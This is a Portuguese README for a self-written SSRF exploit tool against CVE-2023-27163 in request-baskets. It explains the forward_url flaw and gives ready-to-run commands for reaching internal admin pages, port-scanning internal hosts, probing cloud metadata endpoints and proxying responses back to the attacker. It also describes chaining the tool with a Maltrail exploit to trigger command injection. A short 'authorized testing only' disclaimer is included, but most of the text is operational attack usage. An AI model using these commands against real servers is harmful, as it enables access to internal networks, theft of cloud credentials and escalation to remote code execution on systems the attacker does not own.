
Exploit de SSRF para CVE-2023-27163 em request-baskets, permitindo varredura de portas internas, sondagem de metadados da nuvem e descoberta de serviços através de encaminhamento malicioso de baskets.
Eu escrevi este exploit para atingir a CVE-2023-27163, uma vulnerabilidade de Server-Side Request Forgery (SSRF) encontrada no request-baskets versões ≤ 1.2.1. A falha reside no endpoint /api/baskets/{name}, onde o parâmetro forward_url permite que um atacante faça o servidor emitir requisições HTTP arbitrárias em seu nome.
O exploit cria um "basket" malicioso configurado com um forward_url apontando para um alvo interno. Qualquer requisição feita ao endpoint desse basket é encaminhada pelo servidor para a URL especificada, efetivamente transformando o servidor em um proxy SSRF.
requests (pip install requests)usage: exploit.py [-h] -t TARGET [-f FORWARD_URL] [--proxy-response]
[--insecure-tls] [--no-expand-path] [--capacity CAPACITY]
[--scan-host SCAN_HOST] [--ports PORTS] [--scan]
[--discover] [--cloud-metadata] [--timeout TIMEOUT]
[--delay DELAY]
# Encaminhamento SSRF básico para um serviço interno
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80/admin
# Varredura de portas em um host interno
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 127.0.0.1 --scan
# Sondagem de endpoints de metadados em nuvem
python3 exploit.py -t http://192.168.1.100:55555 --cloud-metadata
# Modo proxy (retorna o corpo da resposta encaminhada)
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80 --proxy-response
# Varredura com faixa de portas personalizada
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 10.0.0.2 \
--ports 80,443,3000,5000,8000,8080,9000
Construí esta ferramenta apenas para fins educacionais e testes de segurança autorizados. Não a utilize contra sistemas sem permissão explícita.
Este exploit SSRF pode ser usado como um ponto de entrada inicial para alcançar serviços internos que não estão diretamente expostos. Eu o projetei para funcionar junto com o Maltrail-v0.53-Exploit — o túnel SSRF permite que você atinja uma instância do Maltrail rodando em localhost e acione a injeção de comandos através dele.